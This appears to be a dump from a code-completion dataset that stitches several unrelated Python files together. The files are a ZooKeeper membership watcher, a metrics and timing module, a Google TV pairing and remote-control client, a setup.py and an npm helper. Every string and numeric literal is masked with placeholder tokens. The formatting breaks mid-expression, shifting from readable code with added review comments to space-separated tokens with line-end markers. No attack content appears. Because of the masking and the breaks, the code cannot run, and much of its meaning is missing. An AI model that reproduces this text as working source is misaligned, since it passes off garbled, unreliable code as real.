        self._notification_queue = Queue(<NUM_LIT:0>)
        self._watching = False
        self._cb_blocker = self._CallbackBlocker()
        self._member_filter = member_filter or true
        self._member_factory = member_factory or Member.from_node
        self._running = True
        self._worker = gevent.spawn(self._notification_worker)
        if on_join or on_leave:
            self._monitor()

    def stop(self):
        # Stop dispatching and kill the worker greenlet (non-blocking).
        self._running = False
        if self._worker:
            self._worker.kill(block=False)

    def __iter__(self):
        # Snapshot read under the callback blocker so join/leave callbacks
        # cannot fire mid-listing. Missing path yields an empty set.
        with self._cb_blocker:
            try:
                nodes = self._zk.get_children(self._zk_path)
            except NoNodeError:
                nodes = ()
            members = self._zk_nodes_to_members(nodes)
            return (n for n in members)

    def get_members(self):
        """Current members as a list (fresh read from ZooKeeper)."""
        return list(self)

    def _get_info(self, member):
        """Raw data payload of one member node."""
        info = self._zk.get(posixpath.join(self._zk_path, member))
        return info[<NUM_LIT:0>]

    def _safe_zk_node_to_member(self, node):
        # None when the node vanished between listing and read.
        try:
            return self._member_factory(node, self._get_info(node))
        except NoNodeError:
            return None

    def _zk_nodes_to_members(self, nodes):
        # Filter node names, build members, drop vanished ones.
        return [m for m in (self._safe_zk_node_to_member(n) for n in nodes
                            if self._member_filter(n))
                if m]

    def _monitor(self):
        """Install a DataWatch on the set's root path; children watching
        starts once the path exists (see _data_changed)."""
        if not self._zk.exists(self._zk_path):
            self._log.warn('<STR_LIT>'
                           % self._zk_path)
        DataWatch(self._zk, self._zk_path, self._data_changed)

    def _data_changed(self, data, stat):
        # stat None => path deleted: flush everyone out; otherwise start
        # (once) the children watch.
        if stat is None:
            self._watching = False
            self._send_all_removed()
        elif not self._watching:
            self._watching = True
            self._begin_watch()

    def _begin_watch(self):
        self._log.info('<STR_LIT>' % self._zk_path)
        ChildrenWatch(self._zk, self._zk_path, self._on_set_changed)

    def _send_all_removed(self):
        # Treat every known member as departed.
        for k in self._members.keys():
            member = self._members.pop(k)
            self._on_leave(member)

    def _notification_worker(self):
        """Greenlet loop: drain (new_nodes, removed_nodes) batches from the
        queue and invoke on_leave/on_join, isolating callback exceptions so
        one bad callback cannot kill the worker."""
        while self._running:
            work = self._notification_queue.get()
            self._cb_blocker.ensure_safe()
            try:
                new_nodes, removed_nodes = work
                new_members = self._zk_nodes_to_members(new_nodes)
                self._members.update(((m.name, m) for m in new_members))
                self._log.debug("<STR_LIT>"
                                % (len(new_nodes), len(removed_nodes)))
                for m in removed_nodes:
                    removed_member = self._members.pop(m, None)
                    if removed_member:
                        try:
                            self._on_leave(removed_member)
                        except Exception:
                            self._log.exception('<STR_LIT>')
                    else:
                        self._log.warn('<STR_LIT>' % str(m))
                for m in new_members:
                    try:
                        self._on_join(m)
                    except Exception:
                        self._log.exception('<STR_LIT>')
            except Exception:
                self._log.exception('<STR_LIT>')

    def _on_set_changed(self, children):
        """kazoo ChildrenWatch callback: diff the filtered child list
        against the last snapshot and enqueue the delta for the worker."""
        children = set([c for c in children if self._member_filter(c)])
        current_nodes = set(self._nodes)
        self._nodes = children
        new_nodes = children - current_nodes
        removed_nodes = current_nodes - children
        self._log.debug("<STR_LIT>")
        self._notification_queue.put((new_nodes, removed_nodes)) </s>
<s> from __future__ import absolute_import
from contextlib import contextmanager
from collections import defaultdict, deque, namedtuple
import functools
import itertools
import math
import random
import socket
import time
import gevent
from .timer_queue import LOW_RESOLUTION_TIME_SOURCE

# NOTE(review): '<STR_LIT...>' / <NUM_LIT:...> tokens are masked literals from
# a dataset dump; slot names, metric-name formats and numeric constants
# cannot be recovered from this view. Python 2 era code (iteritems,
# __metaclass__, __cmp__).


class VarzType(object):
    """Enumeration of metric kinds (actual numeric values masked)."""
    Gauge = <NUM_LIT:1>
    Rate = <NUM_LIT:2>
    AggregateTimer = <NUM_LIT:3>
    Counter = <NUM_LIT:4>
    AverageTimer = <NUM_LIT:5>
    AverageRate = <NUM_LIT:6>


class Source(object):
    """Identity of a metric stream: (method, service, endpoint, client_id).
    Hashable and comparable so it can key the varz dictionaries."""
    __slots__ = "<STR_LIT>", "<STR_LIT>", "<STR_LIT>", "<STR_LIT>"

    def __init__(self, method=None, service=None, endpoint=None, client_id=None):
        self.method = method
        self.service = service
        self.endpoint = endpoint
        self.client_id = client_id

    def to_tuple(self):
        return (self.method, self.service, self.endpoint, self.client_id)

    def to_dict(self):
        return {
            "<STR_LIT>": self.method,
            "<STR_LIT>": self.service,
            "<STR_LIT>": self.endpoint,
            "<STR_LIT>": self.client_id,
        }

    def __cmp__(self, other):
        # Non-Sources sort before any Source.
        if not isinstance(other, Source):
            return -<NUM_LIT:1>
        return cmp(self.to_tuple(), other.to_tuple())

    def __hash__(self):
        return hash((self.method, self.service, self.endpoint, self.client_id))


class VarzMetric(object):
    """Callable handle for one registered metric.

    Binds the right VarzReceiver operation for its VARZ_TYPE; with a bound
    source the call is (value...) -> receiver, without one the caller must
    pass the source as the first argument (via _Adapt's reordering).
    """
    VARZ_TYPE = None

    @staticmethod
    def _Adapt(fn):
        # Reorder arguments so unbound metrics are called (source, amount).
        def __Adapt(metric, source, amount=<NUM_LIT:1>):
            fn(source, metric, amount)
        return __Adapt

    def __init__(self, metric, source):
        """metric: registered metric name; source: Source to bind, or falsy
        for an unbound (per-call source) handle."""
        self._metric = metric
        self._source = source
        if self.VARZ_TYPE == VarzType.Gauge:
            self._fn = VarzReceiver.SetVarz
        elif self.VARZ_TYPE in (VarzType.AverageTimer, VarzType.AverageRate):
            self._fn = VarzReceiver.RecordPercentileSample
        else:
            self._fn = VarzReceiver.IncrementVarz
        if source:
            self._fn = functools.partial(self._fn, self._source)
        else:
            self._fn = self._Adapt(self._fn)

    def __call__(self, *args):
        self._fn(self._metric, *args)

    def ForSource(self, source):
        """Return a copy of this metric bound to ``source``."""
        if not isinstance(source, Source):
            raise ValueError("<STR_LIT>", type(source))
        return type(self)(self._metric, source)


class Gauge(VarzMetric): VARZ_TYPE = VarzType.Gauge
class Rate(VarzMetric): VARZ_TYPE = VarzType.Rate
class AverageRate(VarzMetric): VARZ_TYPE = VarzType.AverageRate
class Counter(Rate): VARZ_TYPE = VarzType.Counter


class VarzTimerBase(VarzMetric):
    """Timer metrics: adds a context manager that records elapsed wall time."""

    @contextmanager
    def Measure(self, source=None):
        # NOTE(review): if the wrapped block raises, no sample is recorded
        # (no try/finally here) — preserved as written.
        start_time = time.time()
        yield
        end_time = time.time()
        if source:
            self(source, end_time - start_time)
        else:
            self(end_time - start_time)


class AverageTimer(VarzTimerBase): VARZ_TYPE = VarzType.AverageTimer
class AggregateTimer(VarzTimerBase): VARZ_TYPE = VarzType.AggregateTimer


class VarzMeta(type):
    """Metaclass for VarzBase subclasses: registers each declared metric
    with VarzReceiver and replaces the class entry (in the masked _VARZ
    dict and as a class attribute) with an instantiated, unbound metric."""

    def __new__(mcs, name, bases, dct):
        base_name = dct['<STR_LIT>']
        for metric_suffix, varz_cls in dct['<STR_LIT>'].iteritems():
            metric_name = '<STR_LIT>' % (base_name, metric_suffix)
            VarzReceiver.RegisterMetric(metric_name, varz_cls.VARZ_TYPE)
            varz = varz_cls(metric_name, None)
            dct['<STR_LIT>'][metric_suffix] = varz
            dct[metric_suffix] = varz
        return super(VarzMeta, mcs).__new__(mcs, name, bases, dct)


def VerifySource(source):
    """Assert ``source`` is a Source; returns it for chaining."""
    if not isinstance(source, Source):
        raise ValueError("<STR_LIT>", source)
    return source


class VarzBase(object):
    """Declarative container of metrics for one component. Instantiating
    with a Source rebinds every class-level metric to that source on the
    instance; unknown attributes fall back to the unbound class metrics."""
    __metaclass__ = VarzMeta
    _VARZ = {}
    _VARZ_BASE_NAME = None

    def __init__(self, source):
        source = VerifySource(source)
        for k, v in self._VARZ.iteritems():
            setattr(self, k, v.ForSource(source))

    def __getattr__(self, item):
        return self._VARZ[item]


class _SampleSet(object):
    """Bounded reservoir of percentile samples.

    Fills to max_size, then keeps sampling each new value with (fixed)
    probability p into the deque (which evicts the oldest). last_update
    tracks staleness for the aggregator.
    """
    __slots__ = ('<STR_LIT:data>', '<STR_LIT:i>', '<STR_LIT:p>', '<STR_LIT>', '<STR_LIT>')

    def __init__(self, max_size, data=None, p=<NUM_LIT>):
        data = data or []
        self.data = deque(data, max_size)  # maxlen evicts oldest on append
        self.i = len(data)  # total observations ever offered
        self.p = p
        self.max_size = max_size
        self.last_update = LOW_RESOLUTION_TIME_SOURCE.now

    def Sample(self, value):
        if self.i < self.max_size:
            self.data.append(value)
            self.last_update = LOW_RESOLUTION_TIME_SOURCE.now
        else:
            j = random.random()
            if j < self.p:
                self.data.append(value)
                self.last_update = LOW_RESOLUTION_TIME_SOURCE.now
        self.i += <NUM_LIT:1>


class VarzReceiver(object):
    """Process-global metric store: VARZ_DATA[metric][source] -> value
    (int for counters/gauges, _SampleSet for percentile metrics)."""
    VARZ_METRICS = {}
    VARZ_DATA = defaultdict(lambda: defaultdict(int))
    VARZ_PERCENTILES = [<NUM_LIT>, <NUM_LIT>, <NUM_LIT>, <NUM_LIT>, <NUM_LIT>]
    _MAX_PERCENTILE_SIZE = <NUM_LIT:1000>

    @staticmethod
    def RegisterMetric(metric, varz_type):
        VarzReceiver.VARZ_METRICS[metric] = varz_type

    @staticmethod
    def IncrementVarz(source, metric, amount=<NUM_LIT:1>):
        """Add ``amount`` to a counter/rate cell."""
        VarzReceiver.VARZ_DATA[metric][VerifySource(source)] += amount

    @staticmethod
    def SetVarz(source, metric, value):
        """Overwrite a gauge cell."""
        VarzReceiver.VARZ_DATA[metric][VerifySource(source)] = value

    @classmethod
    def RecordPercentileSample(cls, source, metric, value):
        """Append ``value`` to the cell's _SampleSet, lazily replacing the
        defaultdict's int-zero placeholder on first use."""
        source = VerifySource(source)
        reservoir = cls.VARZ_DATA[metric][source]
        if reservoir == <NUM_LIT:0>:
            reservoir = _SampleSet(cls._MAX_PERCENTILE_SIZE)
            cls.VARZ_DATA[metric][source] = reservoir
        reservoir.Sample(value)


def DefaultKeySelector(k):
    """Default aggregation key: collapse sources to (service, client_id)."""
    VerifySource(k)
    return k.service, k.client_id


class VarzAggregator(object):
    """Aggregates raw varz by a key selector (continues past this view)."""
    MAX_AGG_AGE = <NUM_LIT:5> * <NUM_LIT>

    class _Agg(object):
        # Accumulator: total (result), count (inputs), work (scratch value
        # or sample list depending on metric kind).
        __slots__ = '<STR_LIT>', '<STR_LIT:count>', '<STR_LIT>'

        def __init__(self):
            self.total = <NUM_LIT:0.0>
            self.count = <NUM_LIT:0>
            self.work = <NUM_LIT:0.0>

    @staticmethod
    def CalculatePercentile(values, pct):
        # Linear-interpolation percentile over an already-sorted sequence.
        if not values:
            return <NUM_LIT:0>
        k = (len(values) - <NUM_LIT:1>) * pct
        f = math.floor(k)
        c = math.
ceil ( k ) <EOL> if f == c : <EOL> return values [ int ( k ) ] <EOL> d0 = values [ int ( f ) ] * ( c - k ) <EOL> d1 = values [ int ( c ) ] * ( k - f ) <EOL> return d0 + d1 <EOL> @ staticmethod <EOL> def _Downsample ( lst , target_size ) : <EOL> if target_size == <NUM_LIT:0> : <EOL> return <EOL> elif len ( lst ) < <NUM_LIT:3> or len ( lst ) <= target_size : <EOL> for n in lst : <EOL> yield n <EOL> else : <EOL> skip = len ( lst ) / target_size <EOL> lst = sorted ( lst ) <EOL> for i , n in enumerate ( lst [ <NUM_LIT:0> : - <NUM_LIT:2> ] ) : <EOL> if i % skip == <NUM_LIT:0> : <EOL> yield n <EOL> yield lst [ - <NUM_LIT:1> ] <EOL> @ staticmethod <EOL> def Aggregate ( varz , metrics , key_selector = None ) : <EOL> """<STR_LIT>""" <EOL> if not key_selector : <EOL> key_selector = DefaultKeySelector <EOL> agg = defaultdict ( dict ) <EOL> now = LOW_RESOLUTION_TIME_SOURCE . now <EOL> for metric in varz . keys ( ) : <EOL> if metric not in metrics : <EOL> continue <EOL> varz_type = metrics [ metric ] <EOL> assert isinstance ( varz_type , int ) , varz_type <EOL> metric_agg = agg [ metric ] <EOL> gevent . sleep ( <NUM_LIT:0> ) <EOL> for source in varz [ metric ] . keys ( ) : <EOL> key = key_selector ( source ) <EOL> data = varz [ metric ] [ source ] <EOL> if key not in metric_agg : <EOL> metric_agg [ key ] = VarzAggregator . _Agg ( ) <EOL> if isinstance ( data , _SampleSet ) : <EOL> metric_agg [ key ] . work = [ ] <EOL> if isinstance ( data , _SampleSet ) : <EOL> if ( now - data . last_update ) < VarzAggregator . MAX_AGG_AGE : <EOL> metric_agg [ key ] . work . append ( data ) <EOL> metric_agg [ key ] . count += <NUM_LIT:1> <EOL> else : <EOL> metric_agg [ key ] . work += data <EOL> metric_agg [ key ] . count += <NUM_LIT:1> <EOL> if varz_type in ( VarzType . AggregateTimer , VarzType . Counter , <EOL> VarzType . Gauge , VarzType . Rate ) : <EOL> for source_agg in metric_agg . values ( ) : <EOL> source_agg . total = source_agg . work <EOL> elif varz_type in ( VarzType . 
AverageTimer , VarzType . AverageRate ) : <EOL> for source_agg in metric_agg . values ( ) : <EOL> if source_agg . count > <NUM_LIT:0> : <EOL> pct_sample = <NUM_LIT:1.0> / source_agg . count <EOL> values = [ VarzAggregator . _Downsample ( v . data , int ( len ( v . data ) * pct_sample ) ) <EOL> for v in source_agg . work ] <EOL> values = sorted ( itertools . chain ( * values ) ) <EOL> else : <EOL> values = [ ] <EOL> source_agg . total = [ <EOL> VarzAggregator . CalculatePercentile ( values , pct ) <EOL> for pct in VarzReceiver . VARZ_PERCENTILES <EOL> ] <EOL> if values : <EOL> source_agg . total . insert ( <NUM_LIT:0> , sum ( values ) / float ( len ( values ) ) ) <EOL> else : <EOL> source_agg . total . insert ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> source_agg . work = None <EOL> else : <EOL> for source_agg in metric_agg . values ( ) : <EOL> source_agg . total = float ( source_agg . work ) / source_agg . count <EOL> return agg <EOL> class VarzSocketWrapper ( object ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> class Varz ( VarzBase ) : <EOL> _VARZ_BASE_NAME = '<STR_LIT>' <EOL> _VARZ = { <EOL> '<STR_LIT>' : Rate , <EOL> '<STR_LIT>' : Rate , <EOL> '<STR_LIT>' : Counter , <EOL> '<STR_LIT>' : Counter , <EOL> '<STR_LIT>' : Rate , <EOL> '<STR_LIT>' : AverageTimer <EOL> } <EOL> def __init__ ( self , socket , varz_tag ) : <EOL> self . _socket = socket <EOL> self . _is_open = self . _socket . isOpen ( ) <EOL> self . _varz = self . Varz ( Source ( service = varz_tag , endpoint = '<STR_LIT>' % ( self . host , self . port ) ) ) <EOL> @ property <EOL> def host ( self ) : <EOL> return self . _socket . host <EOL> @ property <EOL> def port ( self ) : <EOL> return self . _socket . port <EOL> def isOpen ( self ) : <EOL> return self . _socket . isOpen ( ) <EOL> def read ( self , sz ) : <EOL> buff = self . _socket . read ( sz ) <EOL> self . _varz . 
bytes_recv ( len ( buff ) ) <EOL> return buff <EOL> def recv_into ( self , buf , sz ) : <EOL> return self . _socket . handle . recv_into ( buf , sz ) <EOL> def flush ( self ) : <EOL> pass <EOL> def write ( self , buff ) : <EOL> self . _socket . handle . sendall ( buff ) <EOL> self . _varz . bytes_sent ( len ( buff ) ) <EOL> def open ( self ) : <EOL> with self . _varz . open_latency . Measure ( ) : <EOL> self . _socket . open ( ) <EOL> if self . _socket . handle : <EOL> self . _socket . handle . setsockopt ( socket . IPPROTO_TCP , socket . TCP_NODELAY , <NUM_LIT:1> ) <EOL> self . _is_open = True <EOL> self . _varz . connects ( ) <EOL> self . _varz . num_connections ( <NUM_LIT:1> ) <EOL> def close ( self ) : <EOL> if self . _is_open : <EOL> self . _is_open = False <EOL> self . _varz . num_connections ( - <NUM_LIT:1> ) <EOL> self . _socket . close ( ) <EOL> def readAll ( self , sz ) : <EOL> buff = bytearray ( sz ) <EOL> view = memoryview ( buff ) <EOL> have = <NUM_LIT:0> <EOL> while have < sz : <EOL> read_size = sz - have <EOL> chunk_len = self . recv_into ( view [ have : ] , read_size ) <EOL> have += chunk_len <EOL> if chunk_len == <NUM_LIT:0> : <EOL> raise EOFError ( ) <EOL> self . _varz . bytes_recv ( sz ) <EOL> return buff <EOL> class MonoClock ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . _last = time . time ( ) <EOL> def Sample ( self ) : <EOL> """<STR_LIT>""" <EOL> now = time . time ( ) <EOL> if now - self . _last > <NUM_LIT:0> : <EOL> self . _last = now <EOL> return self . _last <EOL> class Ema ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , window ) : <EOL> """<STR_LIT>""" <EOL> self . _window = window <EOL> self . _time = - <NUM_LIT:1> <EOL> self . value = <NUM_LIT:0.0> <EOL> def Update ( self , ts , sample ) : <EOL> """<STR_LIT>""" <EOL> if self . _time == - <NUM_LIT:1> : <EOL> self . _time = ts <EOL> self . value = float ( sample ) <EOL> else : <EOL> delta = ts - self . _time <EOL> self . 
_time = ts <EOL> window = <NUM_LIT:0> if self . _window == <NUM_LIT:0> else math . exp ( - float ( delta ) / self . _window ) <EOL> self . value = ( sample * ( <NUM_LIT:1> - window ) ) + ( self . value * window ) <EOL> return self . value </s>
<s> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> import socket <EOL> import ssl <EOL> import struct <EOL> import hashlib <EOL> import itertools <EOL> import M2Crypto . X509 <EOL> from googletv . proto import keycodes_pb2 <EOL> from googletv . proto import polo_pb2 <EOL> from googletv . proto import remote_pb2 <EOL> ENCODING_TYPE_HEXADECIMAL = polo_pb2 . Options . Encoding . ENCODING_TYPE_HEXADECIMAL <EOL> ROLE_TYPE_INPUT = polo_pb2 . Options . ROLE_TYPE_INPUT <EOL> class Error ( Exception ) : <EOL> """<STR_LIT>""" <EOL> class MessageTypeError ( Error ) : <EOL> """<STR_LIT>""" <EOL> class BaseProtocol ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , host , port , certfile ) : <EOL> self . host = host <EOL> self . port = port <EOL> self . sock = socket . socket ( ) <EOL> self . ssl = ssl . wrap_socket ( self . sock , certfile = certfile ) <EOL> self . certfile = certfile <EOL> def __enter__ ( self ) : <EOL> self . connect ( ) <EOL> return self <EOL> def __exit__ ( self , unused_type , unused_val , unused_traceback ) : <EOL> self . close ( ) <EOL> def close ( self ) : <EOL> self . ssl . close ( ) <EOL> def connect ( self ) : <EOL> self . ssl . connect ( ( self . host , self . port ) ) <EOL> def send ( self , data ) : <EOL> data_len = struct . pack ( '<STR_LIT>' , len ( data ) ) <EOL> sent = self . ssl . write ( data_len + data ) <EOL> assert sent == len ( data ) + <NUM_LIT:4> <EOL> return sent <EOL> def recv ( self ) : <EOL> len_raw = self . ssl . recv ( <NUM_LIT:4> ) <EOL> data_len = struct . unpack ( '<STR_LIT>' , len_raw ) [ <NUM_LIT:0> ] <EOL> data = self . ssl . recv ( data_len ) <EOL> assert len ( data ) == data_len <EOL> return data <EOL> class PairingProtocol ( BaseProtocol ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , host , certfile , port = <NUM_LIT> ) : <EOL> super ( PairingProtocol , self ) . 
__init__ ( host , port , certfile ) <EOL> def send_pairing_request ( self , client_name , service_name = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> req = polo_pb2 . PairingRequest ( ) <EOL> req . service_name = service_name <EOL> req . client_name = client_name <EOL> self . _send_message ( req , polo_pb2 . OuterMessage . MESSAGE_TYPE_PAIRING_REQUEST ) <EOL> def send_options ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> options = polo_pb2 . Options ( ) <EOL> encoding = options . input_encodings . add ( ) <EOL> encoding . type = ENCODING_TYPE_HEXADECIMAL <EOL> encoding . symbol_length = <NUM_LIT:4> <EOL> self . _send_message ( options , polo_pb2 . OuterMessage . MESSAGE_TYPE_OPTIONS ) <EOL> def send_configuration ( self , encoding_type = ENCODING_TYPE_HEXADECIMAL , <EOL> symbol_length = <NUM_LIT:4> , client_role = ROLE_TYPE_INPUT ) : <EOL> """<STR_LIT>""" <EOL> req = polo_pb2 . Configuration ( ) <EOL> req . encoding . type = encoding_type <EOL> req . encoding . symbol_length = symbol_length <EOL> req . client_role = client_role <EOL> self . _send_message ( req , polo_pb2 . OuterMessage . MESSAGE_TYPE_CONFIGURATION ) <EOL> def send_secret ( self , code ) : <EOL> """<STR_LIT>""" <EOL> req = polo_pb2 . Secret ( ) <EOL> req . secret = self . _make_secret_payload ( self . _encode_hex_secret ( code ) ) <EOL> self . _send_message ( req , polo_pb2 . OuterMessage . MESSAGE_TYPE_SECRET ) <EOL> def _encode_hex_secret ( self , secret ) : <EOL> """<STR_LIT>""" <EOL> result = bytearray ( len ( secret ) / <NUM_LIT:2> ) <EOL> for i in xrange ( len ( result ) ) : <EOL> start_index = <NUM_LIT:2> * i <EOL> end_index = <NUM_LIT:2> * ( i + <NUM_LIT:1> ) <EOL> result [ i ] = int ( secret [ start_index : end_index ] , <NUM_LIT:16> ) <EOL> return bytes ( result ) <EOL> def _make_secret_payload ( self , encoded_secret ) : <EOL> """<STR_LIT>""" <EOL> servercert = M2Crypto . X509 . load_cert_der_string ( self . ssl . getpeercert ( True ) ) <EOL> clientcert = M2Crypto . X509 . 
load_cert ( self . certfile ) <EOL> def get_key_pair ( c ) : <EOL> return [ remove_null_bytes ( v [ <NUM_LIT:4> : ] ) for v in c . get_pubkey ( ) . get_rsa ( ) . pub ( ) ] <EOL> def remove_null_bytes ( v ) : <EOL> return '<STR_LIT>' . join ( itertools . dropwhile ( lambda x : x == '<STR_LIT>' , v ) ) <EOL> sexp , smod = get_key_pair ( servercert ) <EOL> cexp , cmod = get_key_pair ( clientcert ) <EOL> digest = hashlib . sha256 ( ) <EOL> digest . update ( cmod ) <EOL> digest . update ( cexp ) <EOL> digest . update ( smod ) <EOL> digest . update ( sexp ) <EOL> digest . update ( encoded_secret [ len ( encoded_secret ) // <NUM_LIT:2> : ] ) <EOL> return digest . digest ( ) <EOL> def _send_message ( self , message , message_type ) : <EOL> """<STR_LIT>""" <EOL> req = polo_pb2 . OuterMessage ( ) <EOL> req . protocol_version = <NUM_LIT:1> <EOL> req . status = polo_pb2 . OuterMessage . STATUS_OK <EOL> req . type = message_type <EOL> req . payload = message . SerializeToString ( ) <EOL> data = req . SerializeToString ( ) <EOL> return self . send ( data ) <EOL> def _recv_message ( self , expected_type = None ) : <EOL> """<STR_LIT>""" <EOL> types = polo_pb2 . OuterMessage <EOL> message_types = { <EOL> types . MESSAGE_TYPE_CONFIGURATION : polo_pb2 . Configuration , <EOL> types . MESSAGE_TYPE_CONFIGURATION_ACK : polo_pb2 . ConfigurationAck , <EOL> types . MESSAGE_TYPE_OPTIONS : polo_pb2 . Options , <EOL> types . MESSAGE_TYPE_PAIRING_REQUEST : polo_pb2 . PairingRequest , <EOL> types . MESSAGE_TYPE_PAIRING_REQUEST_ACK : polo_pb2 . PairingRequestAck , <EOL> types . MESSAGE_TYPE_SECRET : polo_pb2 . Secret , <EOL> types . MESSAGE_TYPE_SECRET_ACK : polo_pb2 . SecretAck , <EOL> } <EOL> data = self . recv ( ) <EOL> req = polo_pb2 . OuterMessage . FromString ( data ) <EOL> assert req . status == polo_pb2 . OuterMessage . STATUS_OK <EOL> if expected_type and expected_type != req . type : <EOL> expected = message_types [ expected_type ] . __name__ <EOL> actual = message_types [ req . 
type ] . __name__ <EOL> raise MessageTypeError ( '<STR_LIT>' % ( expected , actual ) ) <EOL> message_type = message_types [ req . type ] <EOL> message = message_type . FromString ( req . payload ) <EOL> return message <EOL> def recv_pairing_request_ack ( self ) : <EOL> return self . _recv_message ( <EOL> expected_type = polo_pb2 . OuterMessage . MESSAGE_TYPE_PAIRING_REQUEST_ACK ) <EOL> def recv_configuration_ack ( self ) : <EOL> return self . _recv_message ( <EOL> expected_type = polo_pb2 . OuterMessage . MESSAGE_TYPE_CONFIGURATION_ACK ) <EOL> def recv_secret_ack ( self ) : <EOL> return self . _recv_message ( <EOL> expected_type = polo_pb2 . OuterMessage . MESSAGE_TYPE_SECRET_ACK ) <EOL> def recv_options ( self ) : <EOL> return self . _recv_message ( <EOL> expected_type = polo_pb2 . OuterMessage . MESSAGE_TYPE_OPTIONS ) <EOL> class AnymoteProtocol ( BaseProtocol ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , host , certfile , port = <NUM_LIT> ) : <EOL> super ( AnymoteProtocol , self ) . __init__ ( host , port , certfile ) <EOL> def keycode ( self , keycode , action ) : <EOL> """<STR_LIT>""" <EOL> req = remote_pb2 . RequestMessage ( ) <EOL> req . key_event_message . keycode = keycode <EOL> if action == '<STR_LIT>' : <EOL> req . key_event_message . action = keycodes_pb2 . UP <EOL> else : <EOL> req . key_event_message . action = keycodes_pb2 . DOWN <EOL> self . _send_message ( req ) <EOL> def fling ( self , uri ) : <EOL> """<STR_LIT>""" <EOL> req = remote_pb2 . RequestMessage ( ) <EOL> req . fling_message . uri = uri <EOL> self . _send_message ( req ) <EOL> def mouse ( self , x = <NUM_LIT:0> , y = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> req = remote_pb2 . RequestMessage ( ) <EOL> req . mouse_event_message . x_delta = x <EOL> req . mouse_event_message . y_delta = y <EOL> self . _send_message ( req ) <EOL> def press ( self , keycode ) : <EOL> """<STR_LIT>""" <EOL> self . keycode ( keycode , '<STR_LIT>' ) <EOL> self . 
keycode ( keycode , '<STR_LIT>' ) <EOL> def _send_message ( self , message ) : <EOL> """<STR_LIT>""" <EOL> req = remote_pb2 . RemoteMessage ( ) <EOL> req . request_message . CopyFrom ( message ) <EOL> data = req . SerializeToString ( ) <EOL> return self . send ( data ) </s>
<s> from setuptools import setup , find_packages <EOL> __version__ = "<STR_LIT>" <EOL> setup ( <EOL> name = "<STR_LIT>" , <EOL> version = __version__ , <EOL> description = "<STR_LIT>" , <EOL> author = "<STR_LIT>" , <EOL> author_email = "<STR_LIT>" , <EOL> packages = find_packages ( ) , <EOL> include_package_data = True , <EOL> install_requires = [ <EOL> "<STR_LIT>" , <EOL> ] <EOL> ) </s>
<s> from __future__ import print_function <EOL> import os <EOL> import sys <EOL> import json <EOL> from . . react_template import ReactTemplate <EOL> from subprocess import check_call <EOL> def run ( cmd , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> kwargs [ "<STR_LIT>" ] = ( sys . platform == "<STR_LIT:win32>" ) <EOL> return check_call ( cmd , * args , ** kwargs ) <EOL> class NPM ( object ) : <EOL> package_template = ( """<STR_LIT>""" ) <EOL> dev_dependencies = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> def __init__ ( self , repo_root ) : <EOL> self . repo_root = repo_root <EOL> def create_package_json ( self , <EOL> name = "<STR_LIT>" , <EOL> version = "<STR_LIT>" , <EOL> main = "<STR_LIT>" , <EOL> dependencies = { } , <EOL> scripts = { } ) : <EOL> """<STR_LIT:U+0020>""" <EOL> if "<STR_LIT>" not in scripts : <EOL> _build = "<STR_LIT>" <EOL> scripts [ "<STR_LIT>" ] = _build <EOL> options = { <EOL> "<STR_LIT:name>" : name , <EOL> "<STR_LIT:version>" : version , <EOL> "<STR_LIT>" : main , <EOL> "<STR_LIT>" : json . dumps ( scripts ) , <EOL> "<STR_LIT>" : json . dumps ( dependencies ) , <EOL> "<STR_LIT>" : json . dumps ( self . dev_dependencies ) <EOL> } <EOL> rt = ReactTemplate ( self . 
package_template , <EOL> options , self . repo_root + "<STR_LIT>" ) <EOL> rt . to_js ( ) <EOL> def run ( self ) : <EOL> if not os . path . isfile ( self . repo_root + "<STR_LIT>" ) : <EOL> print ( "<STR_LIT>" , file = sys . stderr ) <EOL> self . create_package_json ( ) <EOL> cmds = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> try : <EOL> run ( cmds , cwd = self . repo_root ) <EOL> except OSError as e : <EOL> print ( "<STR_LIT>" % e , file = sys . stderr ) <EOL> print ( "<STR_LIT>" , file = sys . stderr ) <EOL> raise </s>
